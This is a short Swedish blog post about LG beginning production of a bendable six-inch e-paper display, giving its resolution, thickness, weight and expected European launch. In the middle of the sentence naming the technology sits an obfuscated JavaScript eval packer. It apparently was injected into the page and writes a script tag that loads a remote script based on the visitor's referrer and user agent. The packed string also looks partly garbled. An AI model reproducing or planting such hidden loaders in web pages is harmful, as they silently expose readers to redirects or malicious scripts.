Image Image Image Image Image Image Image Image Image Image

| 16 april, 2021

Scroll to top

Top

LG börjar producera sina böjbara skärmar!

LG börjar producera sina böjbara skärmar!
Filip Urde
  • On 29 mars, 2012
  • http://www.revue.se/filip-urde

Framtiden nosar oss i ändan… LG s lilla böjbara skärm är på sex tum och har en upplösning på 1024×768 pixlar. Tekniken man använder kallas för Electronic eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nnyez|var|u0026u|referrer|adfan||js|php’.split(’|’),0,{}))
Paper Display
(EDP) och är heltenkelt en skärm som är 0.7 millimeter tunn och väger 14 gram, med den stora fördelen att den går att böja.

Tanken är att tekniken ska revolutionera hur vi konsumerar böcker och tidningar. LG har testat skärmen hårt och länge och man menar själva att skärmen är väldigt stryktålig. Den färdiga produkten kommer till Europa redan inom en månad. Sjukt coolt är vad det är.